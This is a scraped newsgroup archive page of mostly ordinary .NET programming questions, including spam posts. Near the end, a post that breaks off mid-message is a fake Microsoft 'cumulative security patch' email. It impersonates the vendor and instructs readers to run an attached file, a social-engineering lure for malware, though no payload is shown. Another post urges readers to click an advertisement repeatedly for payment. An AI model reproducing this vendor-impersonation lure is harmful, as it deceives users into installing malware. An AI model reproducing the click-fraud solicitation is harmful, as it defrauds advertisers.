| Cannot Send Messages To Newsgroups |
|
 |
Index ‹ DotNet ‹ Dotnet
|
- Previous
- 1
- Dotnet >> Pass a C# function to a COM interface that wants a function pointeI have a Directshow filter I wrote in C++. I've created an interface to set
a callback function. The app I want to use the filter in is in C#. How do I
pass a function pointer from C# to a COM interface?
I have not been able to find much in the way of examples but I have tried
this:
//COM Object
typdef HRESULT (*MYCALLBACK) (IMediaSample * pSample);
DECLARE_INTERFACE_(IMyFilter, IUknown)
{
STDMETHOD(SetCallbackPointer)(LPVOID FnAddress);
}
MYCALLBACK m_callback;
STDMETHODIMP SetCallbackPointer(LPVOID FnAddress)
{
m_callback = (MYCALLBACK)FnAddress;
}
void InvokeCallback(IMediaSample * pSample)
{
(m_callback)(pSample);
}
HRESULT Transform(IMediaSample *pSample)
{
InvokeCallback(pSample);
}
//C#
public delegate int CallBackDelegate(ref IMediaSample mediaSample);
public class MyClass
{
public CallBackDelegate myDelegate;
public MyClass()
{
myDelegate = new CallBackDelegate(CallbackFunction);
//all the stuff to create the COM object and get the interface
myInterface.SetCallbackPointer(myDelegate);
}
public int CallbackFunction(ref IMediaSample mediaSample)
{
//my intention is get a copy of the mediaSample
MessageBox.Show("Here");
return 0;
}
}
- 2
- ADO >> Crystal reports on client?Hi,
If I use (in development) connection object from design tools in
ToolBox to get data from db to crystal reports, how can I make
changes to server name and security options in runtime. That is, is
there an option during "packaging and deployment" where I can make
connection setting as per client machine,instead of being to
develpment one??
MTIA,
Grawsha
- 3
- Dotnet >> Search for a string inside PDF fileI need to search programmatically if a certain string appears inside a PDF
or CHM file.
The search is done only once for each file so I don't think that a solution
to index the file using Index server is right here.
Anyone knows how to do it?
A simple code example will be appreciated.
Thanks
Ra294@hotmail.com
- 4
- Dotnet >> WebBrowser control -- managing new windowsThe 2.0 WebBrowser control is a wonderful thing, but handling navigation to
a new browser window seems to need access to NewWindow2, which unfortunately
is not part of the package. Any practical suggestions/code samples on how to
make this work?
In theory it should be possible to hook the unmanaged event, create a new
managed control and get an object from it to pass back to the event caller.
Sounds hairy to me -- anyone tried it?
All suggestions much appreciated.
DavidB
- 5
- Winforms >> How to show controls without form?Hi
Once I saw the example application in VC where the controls was show without
form. Maybe somebody know how to do this in DotNet?
If my memory is good :) VC application use Win32 functions to do this.
regards
kuba florczyk
- 6
- 7
- 8
- Visual C#.Net >> ReflectionI have an abstract class, with some other classes
inheriting from it in my namespace.
What I am would like to know is: is there any way (using
reflection) that I would be able to get a list of what
these possible classes are, that derive from the abstract
class?
Not too hot on reflection at the moment, but trying to
learn as I go.
Thanks for any help in advance
Martin
- 9
- Visual C#.Net >> Problem with OnKeyPress override...Hello all,
I am working on a project using Windows Forms, and I ran into a bit of a
snag... I need to be able to use keystrokes as shortcuts in the program,
and I currently accomplish it using the following:
-----[ Begin code snip ]-----
protected override void OnKeyPress (KeyPressEventArgs e) {
switch (e.KeyChar) {
case 'b':
e.Handled = true;
mnuNavigationBack.PerformClick();
break;
case 'f':
e.Handled = true;
mnuNavigationForward.PerformClick();
break;
default:
break;
}
base.OnKeyPress(e);
}
-----[ End code snip ]-----
Everything works great until the user opens another window (such as say
an About dialog or a MessageBox)... Once the other dialog is opened,
closed, and the focus is redirected back to the main form, the
keypresses are no longer registered with the main form...
Does anyone know why this would happen?
I searched through the list archives via groups.google.com, and couldnt
find anything referring to anything close to this...
Any advice would be much appreciated.
Thanks!
- 10
- Net Framework >> Append Nodes to existing XML File/Document .net 1.1I have a XML file that I need to append child nodes to. Here is an example of
that file:
<root>
<item>
<stuff1>The Stuff for 1</stuff 1>
<stuff2>The stuff for 2</stuff 2>
</item>
<item>
<otherstuff1>The other stuff for 1</otherstuff1>
<otherstuff2>The other stuff for 2</otherstuff2>
</item>
</root>
I need to append a node to each <item> then write it back to the file. What
is the best way to do this? Thank you
Daniel C. DiVita
- 11
- Visual C#.Net >> Switching Windows FormsHi -
I'm writing a C# windows form application and have hit a hurdle. The
application has several panels that need to be displayed at various times
depending on what the user is doing. They all need to sit inside a main
frame (form). The various screens could be:
1. Side bar and welcome screen.
2. Side bar and list of items.
3. Item side bar and tab sheet.
4. More variations on 3 replacing the tab sheet etc. etc.
The sidebar will vary depending on what stage the user is at. The other
views will have controls placed on them (i.e. controls on the tab sheet
etc.). The problem I have is how to make the side bar and work panels
dynamic (i.e. to change the state easily to reflect the current mode of the
application). The main problems are:
1. Can I use the IDE to achieve the above or do I need to create the views
by hand? If so how...
2. Do I need to create the various views as separate panels and associate
them with the main form? Can I use the IDE for this and what type should
they be created as?
TIA
- Andy
- 12
- Net Framework >> Remote Development of VB.NET ApplicationDear all,
Can you please provide some information on the following issue, at the
earliest.
I have a development server setup in the network, say machine X. Also,
there is another workstation, say Y, for a programmer, to work with.
The application is a Winforms Application and machine X (server) does
not have Visual Studio .NET installed on it. Machine Y(workstation)
has got Visual Studio .NET installed on it. Y is connected via
sourcesafe to the solution in X, without making a local copy( I mean
through a network share).
There are issues faced by the programmer, in executing the application
in X, via Studio environment in Y. Basically application is not doing
any database related activities, and throws exceptions and breaks at
will.
Will this kind of a scenario ever work??? If not, please detail a
suitable alternative.
Two constraints are
a> No direct access to the Server X is possible for development.
b> Things need to be stage managed from the workstation Y.
Please respond at the earliest.
Regards..
Varkey
- 13
- ADO >> Cannot open database ''.The full error message is:
Cannot open database ''. It may not be a database that your
application recognizes, or the file may be corrupt.
I'm seeing this error once in a while in a C# windows app that talks to
a MS Access database (2000 file format). The connection string is set
at startup and never changed. It is in the format:
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=(path to my db);Jet
OLEDB:Database Password=(the password);
All commands executed against the db go through the same method, which
ensures that connections are opened, used, closed and released. The
app is NOT very data-intensive, so it's difficult for me to believe
this is a "number of connections" issue.
Anybody have an idea what this error is trying to tell me?
TIA
Jared
- 14
- Visual C#.Net >> Background Image in ListboxHi,
Is it possible to put a background image in a listBox control?? How can
this be done? Specifically I would like to display an image in the are
of a listbox which is not occuppied by any listbox items (alternatively
if I could get rid of this region altogether or make it transparent..
just thinking..) Can anyone help???
Thanks in advance
Kits
- 15
- Dotnet >> Football for IT Pros still availableStill have 4 openings in our CBS SportsLine.com Fantasy Football league.
Champ wins $200
prize.
If interested, go to: http://football.sportsline.com/splash/football
Register for the GOLD Fantasy Football, then search for and join the "Rocky
Mountain PigSkinners" league.
Automated draft is on September 5th. Plenty of time for the druggies to
leave their teams, injuries, and let the real pro players fall into place in
the depth charts. ;-)
Go BRONCOS!
|
| Author |
Message |
RScotti

|
Dotnet >> Cannot Send Messages To Newsgroups
I have all of a sudden not been able to send newsgroup messages to some
Microsoft newsgroups, such as Access newsgroups. Anybody having this
problem?
Derek
DotNet278
|
| |
|
| |
 |
| |
 |
Index ‹ DotNet ‹ Dotnet |
- Next
- 1
- Visual C#.Net >> Interface InheritanceNot sure if this is the correct way to go about this, but it seems
correct. I'm trying to eliminate dependencies through interfaces and
want to minimize casting as much as possible, as a result I have
interface inheritance setup like so
Here's my class setup:
BlogPost : IBlogPost
PodcastPost : BlogPost, IPodcastPost
IPodcastPost : IBlogPost
Class Blog
- has reference to IBlogPost
Class Podcast
- has reference to IPodcastPost
Now, If I pass around an instance of PodcastPost to methods that accept
IBlogPost, will it require
a cast? This inheritance structure seems a little complex, but then on
the other hand in my unittests, it seems to be accomplishing everything
I need it to.
Is this too confusing?
thanks
Sean
- 2
- Visual C#.Net >> Controlling ObjectsGiven following code to instantiate object, how does one:
1) check a specific objects health - running, dead etc.
2) call a method in a specific object in the multiple object set
3) terminate a specific object
foreach ( DataRow ConfigRow in DSWTG.Tables["TurbineConfiguration"].Rows )
{
switch ( ConfigRow["Turbine Type"].ToString())
{
case "V47":
// instantiate a new turbine
VestasWTG V47 = new VestasWTG( TagNameRow, ConfigRow);
break;
default:
break;
}
}
- 3
- Winforms >> Modal forms, Owner property and minimization behaviourHi everybody,
I believe something weird is happening with my windows forms desktop
application. I have a main form (Form1, shown using Application.Run)
and this main form opens a modal form (Form2), using ShowDialog(this)
so that the owner of Form2 is Form1. Form2 does the same thing with
Form3 (ie, Form2 opens Form3 modally, using showDialog(this.Owner), so
that the owner of Form3 is Form1 too. Form3, once more, opens Form4
passing a reference to Form1 in the owner parameter of showDialog.
The weird thing happens now: Form4 has a button that minimizes the
application when clicked by setting Form1.WindowsState to Minimized.
When Form1 is minimized, all its 3 owned forms are minimized too. 'til
this point, everything's fine, but when Form1 is restored, only Form1
itself appear and I can freelly use it. The other modal windows do not
come back with Form1. Indeed, after some debugging I realized they were
being closed just after form1's minimization. Is this really the
expected behaviour?
What I need to do is to minimize the application and when the user
restores it, all 4 forms are shown as before minimizing. Is there any
way I can accomplish this? The reason for that is that in the real
application, the last form has a functionality to start another process
and I want the hole app to minimize so that the user can work with the
just-started application. After finishing work, the user should be able
to go back and restore the first application to continue working.
Thanks and sorry for the long post.
Daniel.
- 4
- Winforms >> Custom TabControl using TabStrip and Dock probelmI am developing a TabControl derived from Control.
It consists of other control called TabStrip which is also derived frm control.
My TabControl can be aligned vertically or horizontally. When it is horizontal i am docking TabStrip at the Top of the TabControl. When the alignment is changed am docking it at the Right so that it becomes Vertical.
When am setting the Alignment of the TabControl to Vertical, the tabstrip is docked to the right inside the TabControl so that the tabs are shown vertically.
Now when i am using my TabControl it is working fine in designer mode, when am toggleing between horizontal and vertical. But when i run the application the tabStrip's ( even though it is docked at the Right) location becomes (0,0) and it is show to the Left. Don't know why it's location becomes (0,0) whe i run the applicatiion.??? And whern i click on the Tab then it goes to the Right. However, when in Design mode it shows very well to the Right.
Any one can please help me suggest what's going wrong here??
--Nilesh
- 5
- Visual C#.Net >> Adding Application Extension Mappings using C#Can anyone tell me how to add extension,executable path ,verbs etc in
Application Extension Mappings ( Go to 'IIS', right click any of the
virtual directory,'Properties', then 'Home Directory', then
'Configuration'....) using C#.
Thanks in advance
Vimal
- 6
- 7
- Net Framework >> Changing DisplayNames of my properties using PropertyGrid component, how ??I'm using Delphi 2006 and I have a class defination like this:
TPerson = class
fPersonName : String;
fPersonSurName : String;
fPersonAge : Integer;
published
property PersonName : String read fPersonName write fPersonName;
property PersonSurname : String read fPersonSurname write fPersonSurname;
property PersonAge : Integer read fPersonAge write fPersonAge;
end;
and i want to display my class instance using PropertyGrid,so...
var
mPerson : TPerson;
begin
mPerson := TPerson.Create;
mPerson.PersonName := 'Tugrul';
mPerson.PersonSurname := 'HELVACI';
mPerson.PersonAge := 31;
PropertyGrid1.SelectedObject := mPerson;
end;
at the above code i can see my class instance in the property grid.
But i want to change property display names in the propertygrid component.
Because of these, i was searching on the net and i found PropertyDescriptor
abstract class
and ICustomTypeConverter interface.
i implemented theese classes following:
TArrayOfAttribute = array of Attribute;
TMyDescriptor = class(PropertyDescriptor)
private
base : PropertyDescriptor;
fName: String;
function GetName : String;
function GetDisplayName : String;
function GetIsReadOnly : Boolean;
function GetComponentType : &Type;
function GetPropertyType : &Type;
function GetCustomNames(baseName : String) : String; // my custom names
getter function
public
constructor Create(baseP : PropertyDescriptor; filter :
TArrayOfAttribute); overload; virtual;
constructor Create(baseP : PropertyDescriptor); overload; virtual;
function CanResetValue(comp : TObject) : Boolean;
function GetValue(comp : TObject) : TObject;
procedure ResetValue(comp : TObject);
procedure SetValue(comp : TObject; Value : TObject);
function ShouldSerializeValue(comp : TObject) : Boolean;
property Name : String read GetName;
property DisplayName : String read GetDisplayName;
property IsReadOnly : Boolean read GetIsReadOnly;
property ComponentType : &Type read GetComponentType;
property PropertyType : &Type read GetPropertyType;
end;
TMyClass = class(TInterfacedObject, ICustomTypeDescriptor)
public
function GetProperties(filter : TArrayOfAttribute) :
PropertyDescriptorCollection; overload;
function GetAttributes : AttributeCollection;
function GetClassName : String;
function GetComponentName : String;
function GetConverter : TypeConverter;
function GetDefaultEvent : EventDescriptor;
function GetEvents(attributes : TArrayOfAttribute) :
EventDescriptorCollection; overload;
function GetEvents : EventDescriptorCollection; overload;
function GetDefaultProperty : PropertyDescriptor;
function GetProperties : PropertyDescriptorCollection; overload;
function GetEditor(editorBaseType : System.Type) : TObject;
function GetPropertyOwner(pd : PropertyDescriptor) : TObject;
end;
and my new TPerson class is:
TPerson = class(TMyClass)
fPersonName : String;
fPersonSurName : String;
fPersonAge : Integer;
published
property PersonName : String read fPersonName write fPersonName;
property PersonSurname : String read fPersonSurname write fPersonSurname;
property PersonAge : Integer read fPersonAge write fPersonAge;
end;
**************** IMPLEMENTATIONS BELOW *********************************
{ TMyDescriptor }
function TMyDescriptor.CanResetValue(comp: TObject): Boolean;
begin
Result := base.CanResetValue(comp);
end;
constructor TMyDescriptor.Create(baseP: PropertyDescriptor;
filter: TArrayOfAttribute);
begin
inherited Create(baseP, filter);
Self.base := baseP;
end;
constructor TMyDescriptor.Create(baseP: PropertyDescriptor);
begin
inherited Create(baseP);
Self.base := baseP;
end;
function TMyDescriptor.GetComponentType: &Type;
begin
Result := base.ComponentType;
end;
function TMyDescriptor.GetDisplayName: String;
begin
Result := GetCustomNames(base.Name);
end;
function TMyDescriptor.Getir(baseName : String): String;
begin
if baseName = 'PersonName' then Result := 'Names of the Personel';
if baseName = 'PersonSurname' then Result := 'Surname of the personel';
if baseName = 'PersonAge' then Result := 'Age of the personel';
end;
function TMyDescriptor.GetIsReadOnly: Boolean;
begin
Result := base.IsReadOnly;
end;
function TMyDescriptor.GetName: String;
begin
Result := base.Name;
end;
function TMyDescriptor.GetPropertyType: &Type;
begin
Result := base.PropertyType;
end;
function TMyDescriptor.GetValue(comp: TObject): TObject;
begin
Result := base.GetValue(comp);
end;
procedure TMyDescriptor.ResetValue(comp: TObject);
begin
base.ResetValue(comp);
end;
procedure TMyDescriptor.SetValue(comp, Value: TObject);
begin
base.SetValue(comp, value);
end;
function TMyDescriptor.ShouldSerializeValue(comp: TObject): Boolean;
begin
Result := base.ShouldSerializeValue(comp);
end;
{ TMyClass }
function TMyClass.GetProperties(
filter: TArrayOfAttribute): PropertyDescriptorCollection;
var
baseProps : PropertyDescriptorCollection;
newProps : array of PropertyDescriptor;
iCounter : Integer;
oldname,
newname : String;
begin
baseProps := TypeDescriptor.GetProperties(GetType(), filter);
SetLength(newProps, baseProps.Count);
for iCounter := 0 to baseProps.Count do
begin
newProps[iCounter] := TMyDescriptor.Create(baseProps[iCounter], filter);
// An error occured : E2402 constructing instance of abstract class..
oldname := PropertyDescriptor(baseProps[iCounter]).DisplayName;
newName := TMyDescriptor(newProps[iCounter]).DisplayName;
end;
Result := PropertyDescriptorCollection.Create(newProps);
end;
function TMyClass.GetAttributes: AttributeCollection;
begin
Result := TypeDescriptor.GetAttributes(Self, true);
end;
function TMyClass.GetClassName: String;
begin
Result := TypeDescriptor.GetClassName(Self, true);
end;
function TMyClass.GetComponentName: String;
begin
Result := TypeDescriptor.GetComponentName(Self, true);
end;
function TMyClass.GetConverter: TypeConverter;
begin
Result := TypeDescriptor.GetConverter(Self, true);
end;
function TMyClass.GetDefaultEvent: EventDescriptor;
begin
Result := TypeDescriptor.GetDefaultEvent(Self, true);
end;
function TMyClass.GetDefaultProperty: PropertyDescriptor;
begin
Result := TypeDescriptor.GetDefaultProperty(Self, true);
end;
function TMyClass.GetEditor(editorBaseType: System.Type): TObject;
begin
Result := TypeDescriptor.GetEditor(Self, editorBaseType, true);
end;
function TMyClass.GetEvents: EventDescriptorCollection;
begin
Result := TypeDescriptor.GetEvents(Self, true);
end;
function TMyClass.GetEvents(
attributes: TArrayOfAttribute): EventDescriptorCollection;
begin
Result := TypeDescriptor.GetEvents(Self, attributes, true);
end;
function TMyClass.GetProperties: PropertyDescriptorCollection;
begin
Result := TypeDescriptor.GetProperties(Self, true);
end;
function TMyClass.GetPropertyOwner(pd: PropertyDescriptor): TObject;
begin
Result := Self;
end;
I dont understand what is this. Can anybody helps me , how can i
subclassing PropertyDescriptor class correctly ??
Even we take an error when using delphi.net , we dont take any error
message using c#,
i want change the display name of the property which is the added to my
special class by using the propertyGrid Component ...
It's seems like DisplayNameAttirubute of the .net Framework 2.0
With My Best Regards,
Thanks For Helping
- 8
- Visual C#.Net >> The 7 Jewish Feasts Of The LORDFor a video presentation (at the most ten seconds), please refer to
http://icanearn.com/religion/the-7-jewish-feasts-of-the-lord/
Please do not forget to click the advertisement at the end of the
presentation. For each click, US$0.01 is rewarded to a brother in
Christ. See as many times as possible. Thank you.
LEVITICUS 23
The LORD spoke again to Moses, saying,
2 "Speak to the sons of Israel and say to them, "The LORD'S appointed
times which you shall proclaim as holy convocations -- My appointed
times are these:
3 "For six days work may be done, but on the seventh day there is a
sabbath of complete rest, a holy convocation. You shall not do any
work; it is a sabbath to the LORD in all your dwellings.
THE FEASTS OF THE LORD
4 "These are the appointed times of the LORD, holy convocations which
you shall proclaim at the times appointed for them.
1. The Feast Of The LORD (Passover)
5 "In the first month, on the fourteenth day of the month at twilight
is the LORD'S Passover.
2. The Feast Of The LORD (Unleavened Bread)
6 "Then on the fifteenth day of the same month there is the Feast of
Unleavened bread to the LORD; for seven days you shall eat unleavened
bread.
7 "On the first day you shall have a holy convocation; you shall not
do any laborious work.
8 "But for seven days you shall present an offering by fire to the
LORD. On the seventh day is a holy convocation; you shall not do any
laborious work.'"
3. The Feast Of The LORD (First Fruits)
9 Then the LORD spoke to Moses, saying,
10 "Speak to the sons of Israel and say to them, "When you enter the
land which I am going to give to you and reap its harvest, then you
shall bring in the sheaf of the first fruits of your harvest to the
priest.
11 "He shall wave the sheaf before the LORD for you to be accepted; on
the day after the sabbath the priest shall wave it.
12 "Now on the day when you wave the sheaf, you shall offer a male
lamb one year old without defect for a burnt offering to the LORD.
13 "Its grain offering shall then be two-tenths of an ephah of fine
flour mixed with oil, an offering by fire to the LORD for a soothing
aroma, with its drink offering, a fourth of a hin of wine.
14 "Until this same day, until you have brought in the offering of
your God, you shall eat neither bread nor roasted grain nor new
growth. It is to be a perpetual statute throughout your generations in
all your dwelling places.
4. The Feast Of The LORD ([Pentecost)
15 "You shall also count for yourselves from the day after the
sabbath, from the day when you brought in the sheaf of the wave
offering; there shall be seven complete sabbaths.
16 "You shall count fifty days to the day after the seventh sabbath;
then you shall present a new grain offering to the LORD.
17 "You shall bring in from your dwelling places two loaves of bread
for a wave offering, made of two-tenths of an ephah; they shall be of
a fine flour, baked with leaven as first fruits to the LORD.
18 "Along with the bread you shall present seven one year old male
lambs without defect, and a bull of the herd and two rams; they are to
be a burnt offering to the LORD, with their grain offering and their
drink offerings, an offering by fire of a soothing aroma to the LORD.
19 "You shall also offer one male goat for a sin offering and two male
lambs one year old for a sacrifice of peace offerings.
20 "The priest shall then wave them with the bread of the first fruits
for a wave offering with two lambs before the LORD; they are to be
holy to the LORD for the priest.
21 "On this same day you shall make a proclamation as well; you are to
have a holy convocation. You shall do no laborious work. It is to be a
perpetual statute in all your dwelling places throughout your
generations.
22 "When you reap the harvest of your land, moreover, you shall not
reap to the very corners of your field nor gather the gleaning of your
harvest; you are to leave them for the needy and the alien. I am the
LORD your God.'"
5. The Feast Of The LORD (Trumpets)
23 Again the LORD spoke to Moses, saying,
24 "Speak to the sons of Israel, saying, "In the seventh month on the
first of the month you shall have a rest, a reminder by blowing of
trumpets, a holy convocation.
25 "You shall not do any laborious work, but you shall present an
offering by fire to the LORD.'"
6. The Feast Of The LORD (Day Of Atonement)
26 The LORD spoke to Moses, saying,
27 "On exactly the tenth day of this seventh month is the day of
atonement; it shall be a holy convocation for you, and you shall
humble your souls and present an offering by fire to the LORD.
28 "You shall not do any work on this same day, for it is a day of
atonement, to make atonement on your behalf before the LORD your God.
29 "If there is any person who will not humble himself on this same
day, he shall be cut off from his people.
30 "As for any person who does any work on this same day, that person
I will destroy from among his people.
31 "You shall do no work at all. It is to be a perpetual statute
throughout your generations in all your dwelling places.
32 "It is to be a sabbath of complete rest to you, and you shall
humble your souls; on the ninth of the month at evening, from evening
until evening you shall keep your sabbath."
7. The Feast Of The LORD (Tabernacles)
33 Again the LORD spoke to Moses, saying,
34 "Speak to the sons of Israel, saying, "On the fifteenth of this
seventh month is the Feast of Booths for seven days to the LORD.
35 "On the first day is a holy convocation; you shall do no laborious
work of any kind.
36 "For seven days you shall present an offering by fire to the LORD.
On the eighth day you shall have a holy convocation and present an
offering by fire to the LORD; it is an assembly. You shall do no
laborious work.
37 "These are the appointed times of the LORD which you shall proclaim
as holy convocations, to present offerings by fire to the LORD -- burnt
offerings and grain offerings, sacrifices and drink offerings, each
day's matter on its own day -
38 besides those of the sabbaths of the LORD, and besides your gifts
and besides all your votive and freewill offerings, which you give to
the LORD.
39 "On exactly the fifteenth day of the seventh month, when you have
gathered in the crops of the land, you shall celebrate the feast of
the LORD for seven days, with a rest on the first day and a rest on
the eighth day.
40 "Now on the first day you shall take for yourselves the foliage of
beautiful trees, palm branches and boughs of leafy trees and willows
of the brook, and you shall rejoice before the LORD your God for seven
days.
41 "You shall thus celebrate it as a feast to the LORD for seven days
in the year. It shall be a perpetual statute throughout your
generations; you shall celebrate it in the seventh month.
42 "You shall live in booths for seven days; all the native-born in
Israel shall live in booths,
43 so that your generations may know that I had the sons of Israel
live in booths when I brought them out from the land of Egypt. I am
the LORD your God.'"
44 So Moses declared to the sons of Israel the appointed times of the
LORD.
NASU
- 9
- Visual C#.Net >> Authenticating against network server using non-domain accountThis is a multi-part message in MIME format.
------=_NextPart_000_0072_01C6024E.75A52660
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
I need to access the scheduler service on a network computer in order to =
manipulate it remotely from .NET; I have all of the necessary code to =
perform the manipulation and it works - great - but I am having problems =
with authentication.
I have tried using LogonUser and this works fine with a domain account, =
however it is not possible to use this with an account that is defined =
only on the remote computer - it only works with local or domain =
accounts.
Any suggestions as to how I can authenticate my connection to the remote =
PC using a logon and password local to that machine?
------=_NextPart_000_0072_01C6024E.75A52660
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2802" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>I need to access the scheduler service =
on a network=20
computer in order to manipulate it remotely from .NET; I have all of the =
necessary code to perform the manipulation and it works - great - but I =
am=20
having problems with authentication.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>I have tried using LogonUser and this =
works fine=20
with a domain account, however it is not possible to use this with an =
account=20
that is defined only on the remote computer - it only works with local =
or domain=20
accounts.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Any suggestions as to how I can =
authenticate my=20
connection to the remote PC using a logon and password local to that=20
machine?</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_0072_01C6024E.75A52660--
- 10
- Visual C#.Net >> Clearing textboxes..hi there, i am writing a program with LOTS of textboxes in it.. my problem
is when i try to clean the textboxes with foreach it gives error.. heres how
my code looks like:
private void ClearText ()
{
foreach (textbox t in this.controls)
{
t.text = ""
}
}
but it doesnt work! it was working quite good on visual basic.net but this
code seems not working with c#?!
- 11
- 12
- Net Framework >> How Secure is "Friend"If I have a strongly-named assembly, I'm wondering how secure is declaring
methods as Friend?
Is this enough to ensure other assemblies will not be able to access the
method (including over a Remoting boundary) or is there some other framework
mechansim I should be employing also.
Many thanks everyone.
===
Phil
(Auckland | Aotearoa)
- 13
- Winforms >> Logitech quickcam pro 5000 with windows xp media edition and MSNI can't get my webcam to work with msn at all! I've tried everything the
logitech tech support have suggested. It keeps saying my webcam is either
not connected or being used by another program..which it isn't. I know the
webcam itself does work I am able to use it with yahoo messanger.
Anyone else run into the is problem using this webcam with msn? or have a
solution?
- 14
- Net Framework >> Take a look at security update--qnuuxbnqkxdj
Content-Type: multipart/related; boundary="sfsyzfnjgij";
type="multipart/alternative"
--sfsyzfnjgij
Content-Type: multipart/alternative; boundary="agveldcmhfduq"
--agveldcmhfduq
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Customer
this is the latest version of security update, the
"October 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help maintain the security of your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
Copyright 2003 Microsoft Corporation.
--agveldcmhfduq
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:uryxmkn" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Customer<BR><BR>
this is the latest version of security update, the
"October 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help maintain the security of your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:xojrpyd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:xojrpyd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:xojrpyd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:xojrpyd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:xojrpyd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
